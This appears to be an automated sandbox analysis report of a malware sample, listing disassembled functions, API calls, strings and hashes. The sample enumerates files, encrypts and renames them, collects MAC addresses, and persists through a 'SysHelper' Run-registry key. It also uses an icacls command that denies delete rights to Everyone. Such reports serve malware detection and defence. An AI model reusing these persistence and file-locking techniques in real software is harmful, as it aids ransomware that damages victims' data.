                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEB95
                                                                                                                                                                        • _memset.LIBCMT ref: 002EEBB4
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 002EEBC8
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEBDA
                                                                                                                                                                        • _sprintf.LIBCMT ref: 002EEBF4
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 002EEC44
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 002EEC4F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                                                        • Opcode ID: b2c83c291d3dc09cc3ceba21c8add615097b344ec2878f0218f7f73c34b6c45d
                                                                                                                                                                        • Instruction ID: 4c0fa48c7c700a6e8285f9602d190f724239fbefe0729bbed5214c137810e7de
                                                                                                                                                                        • Opcode Fuzzy Hash: b2c83c291d3dc09cc3ceba21c8add615097b344ec2878f0218f7f73c34b6c45d
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E517171E40249AADF16DFA5CD46FEEBBB8EF19704F200129F905B61C0DB75AA058B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EE670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1593 2ee670-2ee697 call 300c62 * 2 1598 2ee699-2ee6b3 call 301f2d call 300bed 1593->1598 1599 2ee6b4-2ee6c2 GetAdaptersInfo 1593->1599 1601 2ee6db-2ee6e8 GetAdaptersInfo 1599->1601 1602 2ee6c4-2ee6d9 call 300bed call 300c62 1599->1602 1603 2ee6ea-2ee73c call 3004a6 call 301f2d * 2 1601->1603 1604 2ee744-2ee754 call 300bed 1601->1604 1602->1598 1602->1601 1619 2ee741 1603->1619 1619->1604
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EE67F
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EE68B
                                                                                                                                                                        • _wprintf.LIBCMT ref: 002EE69E
                                                                                                                                                                        • _free.LIBCMT ref: 002EE6A4
                                                                                                                                                                          • Part of subcall function 00300BED: HeapFree.KERNEL32(00000000,00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000), ref: 00300C01
                                                                                                                                                                          • Part of subcall function 00300BED: GetLastError.KERNEL32(00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC), ref: 00300C13
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 002EE6B9
                                                                                                                                                                        • _free.LIBCMT ref: 002EE6C5
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EE6CD
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 002EE6E0
                                                                                                                                                                        • _sprintf.LIBCMT ref: 002EE720
                                                                                                                                                                        • _wprintf.LIBCMT ref: 002EE732
                                                                                                                                                                        • _wprintf.LIBCMT ref: 002EE73C
                                                                                                                                                                        • _free.LIBCMT ref: 002EE745
                                                                                                                                                                        Strings
                                                                                                                                                                        • Address: %s, mac: %s, xrefs: 002EE72D
                                                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 002EE71A
                                                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 002EE699
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                                                        • Opcode ID: 1c433130e63df8bf75dc69aa8467b6b8b9674760359260cb28d196c41532a65f
                                                                                                                                                                        • Instruction ID: 20311ac2c8014d08905da948b8fda50f444d2f6486995880aa2c7fc22958c0d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c433130e63df8bf75dc69aa8467b6b8b9674760359260cb28d196c41532a65f
                                                                                                                                                                        • Instruction Fuzzy Hash: DC1159B29025A47AD673A3F65C22FFF77DC8F46702F040265FE88D91C1E6589A0053B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EFB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1997 2efb98-2efb9f 1998 2efba0-2efbb9 1997->1998 1998->1998 1999 2efbbb-2efbcf 1998->1999 2000 2efbd3-2efc02 PathAppendW call 2f8400 1999->2000 2001 2efbd1 1999->2001 2004 2efc0f-2efc29 2000->2004 2005 2efc04-2efc0c call 302587 2000->2005 2001->2000 2007 2efc2b-2efc2f 2004->2007 2008 2efc49-2efc4c 2004->2008 2005->2004 2010 2efc4f-2efc6b PathFileExistsW 2007->2010 2011 2efc31-2efc47 call 3005a0 2007->2011 2008->2010 2013 2efcdf-2efce5 2010->2013 2014 2efc6d-2efc86 call 300c62 2010->2014 2011->2010 2016 2efce7-2efced call 302587 2013->2016 2017 2efcf0-2efd07 call 2f7140 2013->2017 2024 2efc8a-2efc9f lstrcpyW 2014->2024 2025 2efc88 2014->2025 2016->2017 2026 2efd0b-2efd20 FindFirstFileW 2017->2026 2027 2efd09 2017->2027 2028 2efca3-2efcdc lstrcatW call 2f4690 call 2ef0e0 call 300bed 2024->2028 2029 2efca1 2024->2029 2025->2024 2031 2efd22-2efd2d call 302587 2026->2031 2032 2efd30-2efd4c 2026->2032 2027->2026 2028->2013 2029->2028 2031->2032 2035 2efd52-2efd55 2032->2035 2036 2f0072-2f0076 2032->2036 2039 2efd60-2efd6b 2035->2039 2040 2f0078-2f0083 call 302587 2036->2040 2041 2f0086-2f00a4 2036->2041 2045 2efd70-2efd76 2039->2045 2040->2041 2042 2f00a6-2f00ae call 302587 2041->2042 2043 2f00b1-2f00c9 2041->2043 2042->2043 2049 2f00cb-2f00d3 call 302587 2043->2049 2050 2f00d6-2f00ee 2043->2050 2051 2efd78-2efd7b 2045->2051 2052 2efd96-2efd98 2045->2052 2049->2050 2063 2f00fb-2f010b 2050->2063 2064 2f00f0-2f00f8 call 302587 2050->2064 2057 2efd7d-2efd85 2051->2057 2058 2efd92-2efd94 2051->2058 2060 2efd9b-2efd9d 2052->2060 2057->2052 2062 2efd87-2efd90 2057->2062 2058->2060 2065 2f0052-2f0065 FindNextFileW 2060->2065 2066 2efda3-2efdae 2060->2066 2062->2045 2062->2058 2064->2063 2065->2039 2068 2f006b-2f006c FindClose 2065->2068 2069 2efdb0-2efdb6 2066->2069 2068->2036 2071 2efdb8-2efdbb 2069->2071 2072 2efdd6-2efdd8 2069->2072 2074 2efdbd-2efdc5 2071->2074 2075 2efdd2-2efdd4 2071->2075 2073 2efddb-2efddd 2072->2073 2073->2065 2077 2efde3-2efdea 2073->2077 2074->2072 2076 2efdc7-2efdd0 2074->2076 2075->2073 2076->2069 2076->2075 2078 2efec2-2efecc 2077->2078 2079 2efdf0-2efe71 call 2f7140 call 2f5ae0 call 2f4690 call 2f3b70 2077->2079 2080 2efece-2efed5 call 2f1ab0 2078->2080 2081 2efeda-2efede 2078->2081 2103 2efe73-2efe7e call 302587 2079->2103 2104 2efe81-2efea9 2079->2104 2080->2081 2081->2065 2085 2efee4-2eff13 call 2f4690 2081->2085 2091 2eff19-2eff1f 2085->2091 2092 2eff15-2eff17 2085->2092 2095 2eff22-2eff2b 2091->2095 2094 2eff31-2eff6a call 2f5ae0 PathFindExtensionW 2092->2094 2101 2eff6c 2094->2101 2102 2eff9a-2effa8 2094->2102 2095->2095 2098 2eff2d-2eff2f 2095->2098 2098->2094 2106 2eff70-2eff74 2101->2106 2107 2effda-2effde 2102->2107 2108 2effaa 2102->2108 2103->2104 2104->2065 2105 2efeaf-2efebd call 302587 2104->2105 2105->2065 2113 2eff7a 2106->2113 2114 2eff76-2eff78 2106->2114 2115 2f003a-2f0042 2107->2115 2116 2effe0-2effe9 2107->2116 2110 2effb0-2effb4 2108->2110 2117 2effba 2110->2117 2118 2effb6-2effb8 2110->2118 2120 2eff7c-2eff88 call 301c02 2113->2120 2114->2120 2121 2f004f 2115->2121 2122 2f0044-2f004c call 302587 2115->2122 2123 2effed-2efff9 call 301c02 2116->2123 2124 2effeb 2116->2124 2125 2effbc-2effce call 301c02 2117->2125 2118->2125 2134 2eff8a-2eff8f 2120->2134 2135 2eff93 2120->2135 2121->2065 2122->2121 2123->2115 2136 2efffb-2f000b 2123->2136 2124->2123 2125->2115 2137 2effd0-2effd5 2125->2137 2134->2106 2138 2eff91 2134->2138 2139 2eff97 2135->2139 2140 2f000f-2f0026 call 301c02 2136->2140 2141 2f000d 2136->2141 2137->2110 2143 2effd7 2137->2143 2138->2139 2139->2102 2140->2115 2145 2f0028-2f0035 call 2f11c0 2140->2145 2141->2140 2143->2107 2145->2115
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                                                        • Opcode ID: 8fae3e25cfb856c57c900618715fe96ee85bd30ea06260637e4ddf9de084e763
                                                                                                                                                                        • Instruction ID: 705f98a26d576eb4f8175fb5b2f7755071f2613539334876c97326895091034a
                                                                                                                                                                        • Opcode Fuzzy Hash: 8fae3e25cfb856c57c900618715fe96ee85bd30ea06260637e4ddf9de084e763
                                                                                                                                                                        • Instruction Fuzzy Hash: 1EB1AB70D20249CADF21DFA4CD45BEEBBB9BF15308F604079E409AB291EB719A64CF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F1CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 985 2f1cd0-2f1d1a call 30f7c0 RegOpenKeyExW 988 2f2207-2f2216 985->988 989 2f1d20-2f1d8d call 30b420 RegQueryValueExW RegCloseKey 985->989 992 2f1d8f-2f1d91 989->992 993 2f1d93-2f1d9c 989->993 994 2f1daf-2f1dcb call 2f5c10 992->994 995 2f1da0-2f1da9 993->995 999 2f1e7c-2f1e87 994->999 1000 2f1dd1-2f1df8 lstrlenA call 2f3520 994->1000 995->995 996 2f1dab-2f1dad 995->996 996->994 1001 2f1e89-2f1e91 call 302587 999->1001 1002 2f1e94-2f1f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 999->1002 1006 2f1dfa-2f1dfe 1000->1006 1007 2f1e28-2f1e2c 1000->1007 1001->1002 1014 2f1f3a-2f1f3f 1002->1014 1015 2f1f36-2f1f38 1002->1015 1010 2f1e0b-2f1e23 call 2f45a0 1006->1010 1011 2f1e00-2f1e08 call 302587 1006->1011 1012 2f1e2e-2f1e39 call 302587 1007->1012 1013 2f1e3c-2f1e50 PathFileExistsW 1007->1013 1010->1007 1011->1010 1012->1013 1013->999 1021 2f1e52-2f1e57 1013->1021 1020 2f1f40-2f1f49 1014->1020 1019 2f1f4f-2f1f96 call 2f5c10 RpcStringFreeW PathAppendW CreateDirectoryW 1015->1019 1031 2f1fce-2f1fe9 1019->1031 1032 2f1f98-2f1fa0 1019->1032 1020->1020 1024 2f1f4b-2f1f4d 1020->1024 1025 2f1e6a-2f1e6e 1021->1025 1026 2f1e59-2f1e5e 1021->1026 1024->1019 1025->988 1028 2f1e74-2f1e77 1025->1028 1026->1025 1029 2f1e60-2f1e65 call 2f4690 1026->1029 1033 2f21ff-2f2204 call 302587 1028->1033 1029->1025 1038 2f1fef-2f1ff8 1031->1038 1039 2f1feb-2f1fed 1031->1039 1035 2f1fa6-2f1faf 1032->1035 1036 2f1fa2-2f1fa4 1032->1036 1033->988 1042 2f1fb0-2f1fb9 1035->1042 1040 2f1fbf-2f1fc9 call 2f5c10 1036->1040 1044 2f2000-2f2009 1038->1044 1043 2f200f-2f2076 call 2f5c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1039->1043 1040->1031 1042->1042 1045 2f1fbb-2f1fbd 1042->1045 1050 2f207c-2f2107 call 30b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1043->1050 1051 2f21d1-2f21d5 1043->1051 1044->1044 1047 2f200b-2f200d 1044->1047 1045->1040 1047->1043 1058 2f2109-2f2110 call 2f3260 1050->1058 1059 2f2115-2f21a8 call 30b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1050->1059 1053 2f21d7-2f21df call 302587 1051->1053 1054 2f21e2-2f21fa 1051->1054 1053->1054 1054->988 1057 2f21fc 1054->1057 1057->1033 1058->1059 1064 2f21aa-2f21b0 GetLastError 1059->1064 1065 2f21b2-2f21b8 1059->1065 1064->1051 1066 2f21c0-2f21cf WaitForSingleObject 1065->1066 1066->1051 1066->1066
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,003AAC68,000000FF), ref: 002F1D12
                                                                                                                                                                        • _memset.LIBCMT ref: 002F1D3B
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 002F1D63
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,003AAC68,000000FF), ref: 002F1D6C
                                                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 002F1DD6
                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 002F1E48
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 002F1E99
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 002F1EA5
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 002F1EB4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 002F1EBF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002F1ECE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 002F1EDB
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 002F1EFC
                                                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 002F1F14
                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 002F1F64
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 002F1F83
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002F1F8E
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 002F202D
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 002F2036
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 002F204C
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 002F206E
                                                                                                                                                                        • _memset.LIBCMT ref: 002F2090
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,003E02FC), ref: 002F20AA
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 002F20C0
                                                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 002F20CE
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 002F20D7
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 002F20F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002F20FC
                                                                                                                                                                        • _memset.LIBCMT ref: 002F2120
                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 002F2146
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 002F2158
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 002F216D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                                                        • Opcode ID: b5988efe0c9b426779ca0dfd121c27b6627b6585bd0bfd49be360410a7a1e259
                                                                                                                                                                        • Instruction ID: b3701feeb6132e6ae66b98f732eb9fa7ea9d2a3cf3fc21046ddfbf406c0c9bb4
                                                                                                                                                                        • Opcode Fuzzy Hash: b5988efe0c9b426779ca0dfd121c27b6627b6585bd0bfd49be360410a7a1e259
                                                                                                                                                                        • Instruction Fuzzy Hash: 25E17E71D1021EEBDF25DFA0CD49BEEB7BCAF04304F104169E606A6191EB74AA94CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F11C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1067 2f11c0-2f121d CreateFileW 1068 2f18eb-2f18fb 1067->1068 1069 2f1223-2f1232 GetFileSizeEx 1067->1069 1070 2f1234 1069->1070 1071 2f12a3-2f12be VirtualAlloc 1069->1071 1074 2f123c-2f1281 CloseHandle call 2f3100 call 2f59d0 MoveFileW 1070->1074 1075 2f1236-2f123a 1070->1075 1072 2f131a-2f1331 CloseHandle 1071->1072 1073 2f12c0-2f12d5 call 30b420 1071->1073 1080 2f12db-2f12de 1073->1080 1081 2f13b1 1073->1081 1074->1068 1087 2f1287-2f12a2 call 302587 1074->1087 1075->1071 1075->1074 1083 2f12e9-2f130a SetFilePointerEx 1080->1083 1084 2f12e0-2f12e3 1080->1084 1085 2f13b7-2f13ef SetFilePointer 1081->1085 1088 2f130c-2f1314 VirtualFree 1083->1088 1089 2f1332-2f134d ReadFile 1083->1089 1084->1081 1084->1083 1090 2f15bf 1085->1090 1091 2f13f5-2f140d ReadFile 1085->1091 1088->1072 1089->1088 1094 2f134f-2f1354 1089->1094 1092 2f15c5-2f15d9 SetFilePointerEx 1090->1092 1095 2f140f-2f143f VirtualFree CloseHandle call 2f2d50 1091->1095 1096 2f1440-2f1445 1091->1096 1092->1095 1097 2f15df-2f15eb 1092->1097 1094->1088 1100 2f1356-2f1359 1094->1100 1096->1090 1098 2f144b-2f146b 1096->1098 1102 2f160e-2f1643 call 2f30b0 call 2f2840 1097->1102 1103 2f15ed-2f15fc WriteFile 1097->1103 1104 2f1718-2f17d9 lstrlenA call 300be4 lstrlenA call 30d8d0 lstrlenA call 2eeaa0 call 302110 call 2ebbd0 call 2ebd50 call 2f2f70 call 2ec070 1098->1104 1105 2f1471-2f15a8 lstrlenA call 300be4 lstrlenA call 30d8d0 lstrlenA call 2eeaa0 call 302110 call 2ec5c0 call 2f2d10 call 2f2d50 call 2ebbd0 call 2ebd50 call 2f3ff0 call 2f2f70 call 2ec070 SetFilePointer 1098->1105 1100->1085 1106 2f135b-2f1377 call 2f2c40 call 2f7060 1100->1106 1130 2f1647-2f165a WriteFile call 2f2d50 1102->1130 1131 2f1645 1102->1131 1103->1095 1109 2f1602-2f160b call 302110 1103->1109 1185 2f17e1-2f182e call 2f2d50 call 2f2c40 call 2f2bf0 call 2ecba0 1104->1185 1105->1185 1196 2f15ae-2f15ba call 2f2d50 * 2 1105->1196 1127 2f1379-2f13a6 VirtualFree CloseHandle call 2f2d50 1106->1127 1128 2f13a7-2f13af call 2f2d50 1106->1128 1109->1102 1128->1085 1130->1095 1145 2f1660-2f1680 lstrlenA WriteFile 1130->1145 1131->1130 1145->1095 1146 2f1686-2f16de CloseHandle call 2f3100 call 2f59d0 MoveFileW 1145->1146 1162 2f18a7-2f18d3 call 2f3210 call 2f2d50 1146->1162 1163 2f16e4-2f1717 VirtualFree call 2f3210 call 2f2d50 1146->1163 1183 2f18d5-2f18dd VirtualFree 1162->1183 1184 2f18e3-2f18e6 1162->1184 1183->1184 1184->1068 1187 2f18e8-2f18e9 CloseHandle 1184->1187 1203 2f186e-2f18a6 VirtualFree CloseHandle call 2f2d50 * 2 1185->1203 1204 2f1830-2f1832 1185->1204 1187->1068 1196->1090 1204->1203 1205 2f1834-2f185b WriteFile 1204->1205 1205->1203 1207 2f185d-2f1869 call 2f2d50 1205->1207 1207->1092
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 002F120F
                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 002F1228
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F123D
                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 002F1277
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 002F12B1
                                                                                                                                                                        • _memset.LIBCMT ref: 002F12C8
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 002F1301
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 002F1314
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F131B
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 002F1349
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 002F1381
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F1388
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 002F13E6
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 002F1409
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 002F1417
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F141E
